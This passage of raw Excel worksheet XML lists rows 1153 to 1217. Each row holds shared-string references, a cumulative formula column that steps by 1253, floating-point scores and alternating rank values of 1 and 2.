    </row>
    <row r="1153" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1153" t="s">
        <v>2205</v>
      </c>
      <c r="B1153" t="s">
        <v>2206</v>
      </c>
      <c r="C1153">
        <f t="shared" si="17"/>
        <v>10873644</v>
      </c>
      <c r="D1153" t="s">
        <v>2208</v>
      </c>
      <c r="E1153">
        <v>2.680957259144634E-4</v>
      </c>
      <c r="F1153">
        <v>2</v>
      </c>
    </row>
    <row r="1154" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1154" t="s">
        <v>2209</v>
      </c>
      <c r="B1154" t="s">
        <v>2210</v>
      </c>
      <c r="C1154">
        <f t="shared" si="17"/>
        <v>10874897</v>
      </c>
      <c r="D1154" t="s">
        <v>2211</v>
      </c>
      <c r="E1154">
        <v>30.181509017944339</v>
      </c>
      <c r="F1154">
        <v>1</v>
      </c>
    </row>
    <row r="1155" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1155" t="s">
        <v>2209</v>
      </c>
      <c r="B1155" t="s">
        <v>2210</v>
      </c>
      <c r="C1155">
        <f t="shared" si="17"/>
        <v>10876150</v>
      </c>
      <c r="D1155" t="s">
        <v>2212</v>
      </c>
      <c r="E1155">
        <v>3.5059773921966548</v>
      </c>
      <c r="F1155">
        <v>2</v>
      </c>
    </row>
    <row r="1156" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1156" t="s">
        <v>2213</v>
      </c>
      <c r="B1156" t="s">
        <v>2214</v>
      </c>
      <c r="C1156">
        <f t="shared" si="17"/>
        <v>10877403</v>
      </c>
      <c r="D1156" t="s">
        <v>2215</v>
      </c>
      <c r="E1156">
        <v>29.95087814331055</v>
      </c>
      <c r="F1156">
        <v>1</v>
      </c>
    </row>
    <row r="1157" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1157" t="s">
        <v>2213</v>
      </c>
      <c r="B1157" t="s">
        <v>2214</v>
      </c>
      <c r="C1157">
        <f t="shared" si="17"/>
        <v>10878656</v>
      </c>
      <c r="D1157" t="s">
        <v>2216</v>
      </c>
      <c r="E1157">
        <v>8.8818578720092773</v>
      </c>
      <c r="F1157">
        <v>2</v>
      </c>
    </row>
    <row r="1158" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1158" t="s">
        <v>2217</v>
      </c>
      <c r="B1158" t="s">
        <v>2218</v>
      </c>
      <c r="C1158">
        <f t="shared" si="17"/>
        <v>10879909</v>
      </c>
      <c r="D1158" t="s">
        <v>2219</v>
      </c>
      <c r="E1158">
        <v>26.54269981384277</v>
      </c>
      <c r="F1158">
        <v>1</v>
      </c>
    </row>
    <row r="1159" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1159" t="s">
        <v>2217</v>
      </c>
      <c r="B1159" t="s">
        <v>2218</v>
      </c>
      <c r="C1159">
        <f t="shared" si="17"/>
        <v>10881162</v>
      </c>
      <c r="D1159" t="s">
        <v>2220</v>
      </c>
      <c r="E1159">
        <v>6.836392879486084</v>
      </c>
      <c r="F1159">
        <v>2</v>
      </c>
    </row>
    <row r="1160" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1160" t="s">
        <v>2221</v>
      </c>
      <c r="B1160" t="s">
        <v>2222</v>
      </c>
      <c r="C1160">
        <f t="shared" si="17"/>
        <v>10882415</v>
      </c>
      <c r="D1160" t="s">
        <v>2223</v>
      </c>
      <c r="E1160">
        <v>29.667707443237301</v>
      </c>
      <c r="F1160">
        <v>1</v>
      </c>
    </row>
    <row r="1161" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1161" t="s">
        <v>2221</v>
      </c>
      <c r="B1161" t="s">
        <v>2222</v>
      </c>
      <c r="C1161">
        <f t="shared" si="17"/>
        <v>10883668</v>
      </c>
      <c r="D1161" t="s">
        <v>2224</v>
      </c>
      <c r="E1161">
        <v>7.7986764907836914</v>
      </c>
      <c r="F1161">
        <v>2</v>
      </c>
    </row>
    <row r="1162" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1162" t="s">
        <v>2225</v>
      </c>
      <c r="B1162" t="s">
        <v>2226</v>
      </c>
      <c r="C1162">
        <f t="shared" ref="C1162:C1225" si="18">C1161+1253</f>
        <v>10884921</v>
      </c>
      <c r="D1162" t="s">
        <v>2227</v>
      </c>
      <c r="E1162">
        <v>34.069675445556641</v>
      </c>
      <c r="F1162">
        <v>1</v>
      </c>
    </row>
    <row r="1163" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1163" t="s">
        <v>2225</v>
      </c>
      <c r="B1163" t="s">
        <v>2226</v>
      </c>
      <c r="C1163">
        <f t="shared" si="18"/>
        <v>10886174</v>
      </c>
      <c r="D1163" t="s">
        <v>2228</v>
      </c>
      <c r="E1163">
        <v>6.3843874931335449</v>
      </c>
      <c r="F1163">
        <v>2</v>
      </c>
    </row>
    <row r="1164" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1164" t="s">
        <v>2229</v>
      </c>
      <c r="B1164" t="s">
        <v>2230</v>
      </c>
      <c r="C1164">
        <f t="shared" si="18"/>
        <v>10887427</v>
      </c>
      <c r="D1164" t="s">
        <v>2231</v>
      </c>
      <c r="E1164">
        <v>32.327789306640618</v>
      </c>
      <c r="F1164">
        <v>1</v>
      </c>
    </row>
    <row r="1165" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1165" t="s">
        <v>2229</v>
      </c>
      <c r="B1165" t="s">
        <v>2230</v>
      </c>
      <c r="C1165">
        <f t="shared" si="18"/>
        <v>10888680</v>
      </c>
      <c r="D1165" t="s">
        <v>2232</v>
      </c>
      <c r="E1165">
        <v>7.5623169541358948E-3</v>
      </c>
      <c r="F1165">
        <v>2</v>
      </c>
    </row>
    <row r="1166" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1166" t="s">
        <v>2233</v>
      </c>
      <c r="B1166" t="s">
        <v>2234</v>
      </c>
      <c r="C1166">
        <f t="shared" si="18"/>
        <v>10889933</v>
      </c>
      <c r="D1166" t="s">
        <v>2235</v>
      </c>
      <c r="E1166">
        <v>23.738674163818359</v>
      </c>
      <c r="F1166">
        <v>1</v>
      </c>
    </row>
    <row r="1167" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1167" t="s">
        <v>2233</v>
      </c>
      <c r="B1167" t="s">
        <v>2234</v>
      </c>
      <c r="C1167">
        <f t="shared" si="18"/>
        <v>10891186</v>
      </c>
      <c r="D1167" t="s">
        <v>2236</v>
      </c>
      <c r="E1167">
        <v>5.5996346473693848</v>
      </c>
      <c r="F1167">
        <v>2</v>
      </c>
    </row>
    <row r="1168" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1168" t="s">
        <v>2237</v>
      </c>
      <c r="B1168" t="s">
        <v>2238</v>
      </c>
      <c r="C1168">
        <f t="shared" si="18"/>
        <v>10892439</v>
      </c>
      <c r="D1168" t="s">
        <v>2239</v>
      </c>
      <c r="E1168">
        <v>31.203840255737301</v>
      </c>
      <c r="F1168">
        <v>1</v>
      </c>
    </row>
    <row r="1169" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1169" t="s">
        <v>2237</v>
      </c>
      <c r="B1169" t="s">
        <v>2238</v>
      </c>
      <c r="C1169">
        <f t="shared" si="18"/>
        <v>10893692</v>
      </c>
      <c r="D1169" t="s">
        <v>2240</v>
      </c>
      <c r="E1169">
        <v>11.29406070709229</v>
      </c>
      <c r="F1169">
        <v>2</v>
      </c>
    </row>
    <row r="1170" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1170" t="s">
        <v>2241</v>
      </c>
      <c r="B1170" t="s">
        <v>2242</v>
      </c>
      <c r="C1170">
        <f t="shared" si="18"/>
        <v>10894945</v>
      </c>
      <c r="D1170" t="s">
        <v>2243</v>
      </c>
      <c r="E1170">
        <v>14.92962169647217</v>
      </c>
      <c r="F1170">
        <v>1</v>
      </c>
    </row>
    <row r="1171" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1171" t="s">
        <v>2241</v>
      </c>
      <c r="B1171" t="s">
        <v>2242</v>
      </c>
      <c r="C1171">
        <f t="shared" si="18"/>
        <v>10896198</v>
      </c>
      <c r="D1171" t="s">
        <v>2244</v>
      </c>
      <c r="E1171">
        <v>1.5991988182067871</v>
      </c>
      <c r="F1171">
        <v>2</v>
      </c>
    </row>
    <row r="1172" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1172" t="s">
        <v>2245</v>
      </c>
      <c r="B1172" t="s">
        <v>2246</v>
      </c>
      <c r="C1172">
        <f t="shared" si="18"/>
        <v>10897451</v>
      </c>
      <c r="D1172" t="s">
        <v>2247</v>
      </c>
      <c r="E1172">
        <v>24.916360855102539</v>
      </c>
      <c r="F1172">
        <v>1</v>
      </c>
    </row>
    <row r="1173" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1173" t="s">
        <v>2245</v>
      </c>
      <c r="B1173" t="s">
        <v>2246</v>
      </c>
      <c r="C1173">
        <f t="shared" si="18"/>
        <v>10898704</v>
      </c>
      <c r="D1173" t="s">
        <v>2248</v>
      </c>
      <c r="E1173">
        <v>4.2311253547668457</v>
      </c>
      <c r="F1173">
        <v>2</v>
      </c>
    </row>
    <row r="1174" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1174" t="s">
        <v>2249</v>
      </c>
      <c r="B1174" t="s">
        <v>2250</v>
      </c>
      <c r="C1174">
        <f t="shared" si="18"/>
        <v>10899957</v>
      </c>
      <c r="D1174" t="s">
        <v>2251</v>
      </c>
      <c r="E1174">
        <v>34.976119995117188</v>
      </c>
      <c r="F1174">
        <v>1</v>
      </c>
    </row>
    <row r="1175" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1175" t="s">
        <v>2249</v>
      </c>
      <c r="B1175" t="s">
        <v>2250</v>
      </c>
      <c r="C1175">
        <f t="shared" si="18"/>
        <v>10901210</v>
      </c>
      <c r="D1175" t="s">
        <v>2252</v>
      </c>
      <c r="E1175">
        <v>8.8170785903930664</v>
      </c>
      <c r="F1175">
        <v>2</v>
      </c>
    </row>
    <row r="1176" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1176" t="s">
        <v>2253</v>
      </c>
      <c r="B1176" t="s">
        <v>2254</v>
      </c>
      <c r="C1176">
        <f t="shared" si="18"/>
        <v>10902463</v>
      </c>
      <c r="D1176" t="s">
        <v>2255</v>
      </c>
      <c r="E1176">
        <v>37.084781646728523</v>
      </c>
      <c r="F1176">
        <v>1</v>
      </c>
    </row>
    <row r="1177" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1177" t="s">
        <v>2253</v>
      </c>
      <c r="B1177" t="s">
        <v>2254</v>
      </c>
      <c r="C1177">
        <f t="shared" si="18"/>
        <v>10903716</v>
      </c>
      <c r="D1177" t="s">
        <v>2256</v>
      </c>
      <c r="E1177">
        <v>0.7172163724899292</v>
      </c>
      <c r="F1177">
        <v>2</v>
      </c>
    </row>
    <row r="1178" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1178" t="s">
        <v>2257</v>
      </c>
      <c r="B1178" t="s">
        <v>2258</v>
      </c>
      <c r="C1178">
        <f t="shared" si="18"/>
        <v>10904969</v>
      </c>
      <c r="D1178" t="s">
        <v>2259</v>
      </c>
      <c r="E1178">
        <v>31.059112548828121</v>
      </c>
      <c r="F1178">
        <v>1</v>
      </c>
    </row>
    <row r="1179" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1179" t="s">
        <v>2257</v>
      </c>
      <c r="B1179" t="s">
        <v>2258</v>
      </c>
      <c r="C1179">
        <f t="shared" si="18"/>
        <v>10906222</v>
      </c>
      <c r="D1179" t="s">
        <v>2260</v>
      </c>
      <c r="E1179">
        <v>7.0037227123975754E-4</v>
      </c>
      <c r="F1179">
        <v>2</v>
      </c>
    </row>
    <row r="1180" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1180" t="s">
        <v>2261</v>
      </c>
      <c r="B1180" t="s">
        <v>2262</v>
      </c>
      <c r="C1180">
        <f t="shared" si="18"/>
        <v>10907475</v>
      </c>
      <c r="D1180" t="s">
        <v>2263</v>
      </c>
      <c r="E1180">
        <v>32.324974060058587</v>
      </c>
      <c r="F1180">
        <v>1</v>
      </c>
    </row>
    <row r="1181" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1181" t="s">
        <v>2261</v>
      </c>
      <c r="B1181" t="s">
        <v>2262</v>
      </c>
      <c r="C1181">
        <f t="shared" si="18"/>
        <v>10908728</v>
      </c>
      <c r="D1181" t="s">
        <v>2264</v>
      </c>
      <c r="E1181">
        <v>15.69524002075195</v>
      </c>
      <c r="F1181">
        <v>2</v>
      </c>
    </row>
    <row r="1182" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1182" t="s">
        <v>2265</v>
      </c>
      <c r="B1182" t="s">
        <v>2266</v>
      </c>
      <c r="C1182">
        <f t="shared" si="18"/>
        <v>10909981</v>
      </c>
      <c r="D1182" t="s">
        <v>2267</v>
      </c>
      <c r="E1182">
        <v>28.634452819824219</v>
      </c>
      <c r="F1182">
        <v>1</v>
      </c>
    </row>
    <row r="1183" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1183" t="s">
        <v>2265</v>
      </c>
      <c r="B1183" t="s">
        <v>2266</v>
      </c>
      <c r="C1183">
        <f t="shared" si="18"/>
        <v>10911234</v>
      </c>
      <c r="D1183" t="s">
        <v>2268</v>
      </c>
      <c r="E1183">
        <v>2.7289269492030139E-3</v>
      </c>
      <c r="F1183">
        <v>2</v>
      </c>
    </row>
    <row r="1184" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1184" t="s">
        <v>2269</v>
      </c>
      <c r="B1184" t="s">
        <v>2270</v>
      </c>
      <c r="C1184">
        <f t="shared" si="18"/>
        <v>10912487</v>
      </c>
      <c r="D1184" t="s">
        <v>2271</v>
      </c>
      <c r="E1184">
        <v>29.986066818237301</v>
      </c>
      <c r="F1184">
        <v>1</v>
      </c>
    </row>
    <row r="1185" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1185" t="s">
        <v>2269</v>
      </c>
      <c r="B1185" t="s">
        <v>2270</v>
      </c>
      <c r="C1185">
        <f t="shared" si="18"/>
        <v>10913740</v>
      </c>
      <c r="D1185" t="s">
        <v>2272</v>
      </c>
      <c r="E1185">
        <v>0.2068914324045181</v>
      </c>
      <c r="F1185">
        <v>2</v>
      </c>
    </row>
    <row r="1186" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1186" t="s">
        <v>2273</v>
      </c>
      <c r="B1186" t="s">
        <v>2274</v>
      </c>
      <c r="C1186">
        <f t="shared" si="18"/>
        <v>10914993</v>
      </c>
      <c r="D1186" t="s">
        <v>2275</v>
      </c>
      <c r="E1186">
        <v>28.330829620361332</v>
      </c>
      <c r="F1186">
        <v>1</v>
      </c>
    </row>
    <row r="1187" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1187" t="s">
        <v>2273</v>
      </c>
      <c r="B1187" t="s">
        <v>2274</v>
      </c>
      <c r="C1187">
        <f t="shared" si="18"/>
        <v>10916246</v>
      </c>
      <c r="D1187" t="s">
        <v>2276</v>
      </c>
      <c r="E1187">
        <v>5.042525939643383E-3</v>
      </c>
      <c r="F1187">
        <v>2</v>
      </c>
    </row>
    <row r="1188" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1188" t="s">
        <v>2277</v>
      </c>
      <c r="B1188" t="s">
        <v>2278</v>
      </c>
      <c r="C1188">
        <f t="shared" si="18"/>
        <v>10917499</v>
      </c>
      <c r="D1188" t="s">
        <v>2279</v>
      </c>
      <c r="E1188">
        <v>20.12055587768555</v>
      </c>
      <c r="F1188">
        <v>1</v>
      </c>
    </row>
    <row r="1189" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1189" t="s">
        <v>2277</v>
      </c>
      <c r="B1189" t="s">
        <v>2278</v>
      </c>
      <c r="C1189">
        <f t="shared" si="18"/>
        <v>10918752</v>
      </c>
      <c r="D1189" t="s">
        <v>2280</v>
      </c>
      <c r="E1189">
        <v>10.22113132476807</v>
      </c>
      <c r="F1189">
        <v>2</v>
      </c>
    </row>
    <row r="1190" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1190" t="s">
        <v>2281</v>
      </c>
      <c r="B1190" t="s">
        <v>599</v>
      </c>
      <c r="C1190">
        <f t="shared" si="18"/>
        <v>10920005</v>
      </c>
      <c r="D1190" t="s">
        <v>600</v>
      </c>
      <c r="E1190">
        <v>32.105613708496087</v>
      </c>
      <c r="F1190">
        <v>1</v>
      </c>
    </row>
    <row r="1191" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1191" t="s">
        <v>2281</v>
      </c>
      <c r="B1191" t="s">
        <v>599</v>
      </c>
      <c r="C1191">
        <f t="shared" si="18"/>
        <v>10921258</v>
      </c>
      <c r="D1191" t="s">
        <v>2282</v>
      </c>
      <c r="E1191">
        <v>1.464393571950495E-4</v>
      </c>
      <c r="F1191">
        <v>2</v>
      </c>
    </row>
    <row r="1192" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1192" t="s">
        <v>2283</v>
      </c>
      <c r="B1192" t="s">
        <v>2284</v>
      </c>
      <c r="C1192">
        <f t="shared" si="18"/>
        <v>10922511</v>
      </c>
      <c r="D1192" t="s">
        <v>2285</v>
      </c>
      <c r="E1192">
        <v>28.17274284362793</v>
      </c>
      <c r="F1192">
        <v>1</v>
      </c>
    </row>
    <row r="1193" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1193" t="s">
        <v>2283</v>
      </c>
      <c r="B1193" t="s">
        <v>2284</v>
      </c>
      <c r="C1193">
        <f t="shared" si="18"/>
        <v>10923764</v>
      </c>
      <c r="D1193" t="s">
        <v>2286</v>
      </c>
      <c r="E1193">
        <v>13.4628438949585</v>
      </c>
      <c r="F1193">
        <v>2</v>
      </c>
    </row>
    <row r="1194" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1194" t="s">
        <v>2287</v>
      </c>
      <c r="B1194" t="s">
        <v>2288</v>
      </c>
      <c r="C1194">
        <f t="shared" si="18"/>
        <v>10925017</v>
      </c>
      <c r="D1194" t="s">
        <v>2289</v>
      </c>
      <c r="E1194">
        <v>32.143211364746087</v>
      </c>
      <c r="F1194">
        <v>1</v>
      </c>
    </row>
    <row r="1195" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1195" t="s">
        <v>2287</v>
      </c>
      <c r="B1195" t="s">
        <v>2288</v>
      </c>
      <c r="C1195">
        <f t="shared" si="18"/>
        <v>10926270</v>
      </c>
      <c r="D1195" t="s">
        <v>2290</v>
      </c>
      <c r="E1195">
        <v>4.1498034261167049E-3</v>
      </c>
      <c r="F1195">
        <v>2</v>
      </c>
    </row>
    <row r="1196" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1196" t="s">
        <v>2291</v>
      </c>
      <c r="B1196" t="s">
        <v>2292</v>
      </c>
      <c r="C1196">
        <f t="shared" si="18"/>
        <v>10927523</v>
      </c>
      <c r="D1196" t="s">
        <v>2293</v>
      </c>
      <c r="E1196">
        <v>31.12800407409668</v>
      </c>
      <c r="F1196">
        <v>1</v>
      </c>
    </row>
    <row r="1197" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1197" t="s">
        <v>2291</v>
      </c>
      <c r="B1197" t="s">
        <v>2292</v>
      </c>
      <c r="C1197">
        <f t="shared" si="18"/>
        <v>10928776</v>
      </c>
      <c r="D1197" t="s">
        <v>2294</v>
      </c>
      <c r="E1197">
        <v>6.2939448356628418</v>
      </c>
      <c r="F1197">
        <v>2</v>
      </c>
    </row>
    <row r="1198" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1198" t="s">
        <v>2295</v>
      </c>
      <c r="B1198" t="s">
        <v>2296</v>
      </c>
      <c r="C1198">
        <f t="shared" si="18"/>
        <v>10930029</v>
      </c>
      <c r="D1198" t="s">
        <v>2297</v>
      </c>
      <c r="E1198">
        <v>16.995212554931641</v>
      </c>
      <c r="F1198">
        <v>1</v>
      </c>
    </row>
    <row r="1199" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1199" t="s">
        <v>2295</v>
      </c>
      <c r="B1199" t="s">
        <v>2296</v>
      </c>
      <c r="C1199">
        <f t="shared" si="18"/>
        <v>10931282</v>
      </c>
      <c r="D1199" t="s">
        <v>2298</v>
      </c>
      <c r="E1199">
        <v>14.348530769348139</v>
      </c>
      <c r="F1199">
        <v>2</v>
      </c>
    </row>
    <row r="1200" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1200" t="s">
        <v>2299</v>
      </c>
      <c r="B1200" t="s">
        <v>2300</v>
      </c>
      <c r="C1200">
        <f t="shared" si="18"/>
        <v>10932535</v>
      </c>
      <c r="D1200" t="s">
        <v>2301</v>
      </c>
      <c r="E1200">
        <v>26.90180778503418</v>
      </c>
      <c r="F1200">
        <v>1</v>
      </c>
    </row>
    <row r="1201" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1201" t="s">
        <v>2299</v>
      </c>
      <c r="B1201" t="s">
        <v>2300</v>
      </c>
      <c r="C1201">
        <f t="shared" si="18"/>
        <v>10933788</v>
      </c>
      <c r="D1201" t="s">
        <v>2302</v>
      </c>
      <c r="E1201">
        <v>8.2079181671142578</v>
      </c>
      <c r="F1201">
        <v>2</v>
      </c>
    </row>
    <row r="1202" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1202" t="s">
        <v>2303</v>
      </c>
      <c r="B1202" t="s">
        <v>2304</v>
      </c>
      <c r="C1202">
        <f t="shared" si="18"/>
        <v>10935041</v>
      </c>
      <c r="D1202" t="s">
        <v>2305</v>
      </c>
      <c r="E1202">
        <v>34.819145202636719</v>
      </c>
      <c r="F1202">
        <v>1</v>
      </c>
    </row>
    <row r="1203" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1203" t="s">
        <v>2303</v>
      </c>
      <c r="B1203" t="s">
        <v>2304</v>
      </c>
      <c r="C1203">
        <f t="shared" si="18"/>
        <v>10936294</v>
      </c>
      <c r="D1203" t="s">
        <v>2306</v>
      </c>
      <c r="E1203">
        <v>16.493650436401371</v>
      </c>
      <c r="F1203">
        <v>2</v>
      </c>
    </row>
    <row r="1204" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1204" t="s">
        <v>2307</v>
      </c>
      <c r="B1204" t="s">
        <v>2308</v>
      </c>
      <c r="C1204">
        <f t="shared" si="18"/>
        <v>10937547</v>
      </c>
      <c r="D1204" t="s">
        <v>2309</v>
      </c>
      <c r="E1204">
        <v>30.94664192199707</v>
      </c>
      <c r="F1204">
        <v>1</v>
      </c>
    </row>
    <row r="1205" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1205" t="s">
        <v>2307</v>
      </c>
      <c r="B1205" t="s">
        <v>2308</v>
      </c>
      <c r="C1205">
        <f t="shared" si="18"/>
        <v>10938800</v>
      </c>
      <c r="D1205" t="s">
        <v>2310</v>
      </c>
      <c r="E1205">
        <v>10.161404609680179</v>
      </c>
      <c r="F1205">
        <v>2</v>
      </c>
    </row>
    <row r="1206" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1206" t="s">
        <v>2311</v>
      </c>
      <c r="B1206" t="s">
        <v>2312</v>
      </c>
      <c r="C1206">
        <f t="shared" si="18"/>
        <v>10940053</v>
      </c>
      <c r="D1206" t="s">
        <v>2313</v>
      </c>
      <c r="E1206">
        <v>30.92034912109375</v>
      </c>
      <c r="F1206">
        <v>1</v>
      </c>
    </row>
    <row r="1207" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1207" t="s">
        <v>2311</v>
      </c>
      <c r="B1207" t="s">
        <v>2312</v>
      </c>
      <c r="C1207">
        <f t="shared" si="18"/>
        <v>10941306</v>
      </c>
      <c r="D1207" t="s">
        <v>2314</v>
      </c>
      <c r="E1207">
        <v>4.6330537796020508</v>
      </c>
      <c r="F1207">
        <v>2</v>
      </c>
    </row>
    <row r="1208" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1208" t="s">
        <v>2315</v>
      </c>
      <c r="B1208" t="s">
        <v>2316</v>
      </c>
      <c r="C1208">
        <f t="shared" si="18"/>
        <v>10942559</v>
      </c>
      <c r="D1208" t="s">
        <v>2317</v>
      </c>
      <c r="E1208">
        <v>28.214155197143551</v>
      </c>
      <c r="F1208">
        <v>1</v>
      </c>
    </row>
    <row r="1209" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1209" t="s">
        <v>2315</v>
      </c>
      <c r="B1209" t="s">
        <v>2316</v>
      </c>
      <c r="C1209">
        <f t="shared" si="18"/>
        <v>10943812</v>
      </c>
      <c r="D1209" t="s">
        <v>2318</v>
      </c>
      <c r="E1209">
        <v>0.23319366574287409</v>
      </c>
      <c r="F1209">
        <v>2</v>
      </c>
    </row>
    <row r="1210" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1210" t="s">
        <v>2319</v>
      </c>
      <c r="B1210" t="s">
        <v>2320</v>
      </c>
      <c r="C1210">
        <f t="shared" si="18"/>
        <v>10945065</v>
      </c>
      <c r="D1210" t="s">
        <v>2321</v>
      </c>
      <c r="E1210">
        <v>27.725095748901371</v>
      </c>
      <c r="F1210">
        <v>1</v>
      </c>
    </row>
    <row r="1211" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1211" t="s">
        <v>2319</v>
      </c>
      <c r="B1211" t="s">
        <v>2320</v>
      </c>
      <c r="C1211">
        <f t="shared" si="18"/>
        <v>10946318</v>
      </c>
      <c r="D1211" t="s">
        <v>2322</v>
      </c>
      <c r="E1211">
        <v>7.8830704689025879</v>
      </c>
      <c r="F1211">
        <v>2</v>
      </c>
    </row>
    <row r="1212" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1212" t="s">
        <v>2323</v>
      </c>
      <c r="B1212" t="s">
        <v>2324</v>
      </c>
      <c r="C1212">
        <f t="shared" si="18"/>
        <v>10947571</v>
      </c>
      <c r="D1212" t="s">
        <v>2325</v>
      </c>
      <c r="E1212">
        <v>28.368293762207031</v>
      </c>
      <c r="F1212">
        <v>1</v>
      </c>
    </row>
    <row r="1213" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1213" t="s">
        <v>2323</v>
      </c>
      <c r="B1213" t="s">
        <v>2324</v>
      </c>
      <c r="C1213">
        <f t="shared" si="18"/>
        <v>10948824</v>
      </c>
      <c r="D1213" t="s">
        <v>2326</v>
      </c>
      <c r="E1213">
        <v>7.5030088424682617</v>
      </c>
      <c r="F1213">
        <v>2</v>
      </c>
    </row>
    <row r="1214" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1214" t="s">
        <v>2327</v>
      </c>
      <c r="B1214" t="s">
        <v>2328</v>
      </c>
      <c r="C1214">
        <f t="shared" si="18"/>
        <v>10950077</v>
      </c>
      <c r="D1214" t="s">
        <v>2329</v>
      </c>
      <c r="E1214">
        <v>34.147903442382813</v>
      </c>
      <c r="F1214">
        <v>1</v>
      </c>
    </row>
    <row r="1215" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1215" t="s">
        <v>2327</v>
      </c>
      <c r="B1215" t="s">
        <v>2328</v>
      </c>
      <c r="C1215">
        <f t="shared" si="18"/>
        <v>10951330</v>
      </c>
      <c r="D1215" t="s">
        <v>2330</v>
      </c>
      <c r="E1215">
        <v>2.827360868453979</v>
      </c>
      <c r="F1215">
        <v>2</v>
      </c>
    </row>
    <row r="1216" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1216" t="s">
        <v>2331</v>
      </c>
      <c r="B1216" t="s">
        <v>2332</v>
      </c>
      <c r="C1216">
        <f t="shared" si="18"/>
        <v>10952583</v>
      </c>
      <c r="D1216" t="s">
        <v>2333</v>
      </c>
      <c r="E1216">
        <v>20.59075927734375</v>
      </c>
      <c r="F1216">
        <v>1</v>
      </c>
    </row>
    <row r="1217" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1217" t="s">
        <v>2331</v>
      </c>
      <c r="B1217" t="s">
        <v>2332</v>
      </c>
      <c r="C1217">
        <f t="shared" si="18"/>
        <v>10953836</v>
      </c>
      <c r="D1217" t="s">
        <v>2334</v>
      </c>
      <c r="E1217">
        <v>5.7261824607849121</v>
      </c>
      <c r="F1217">
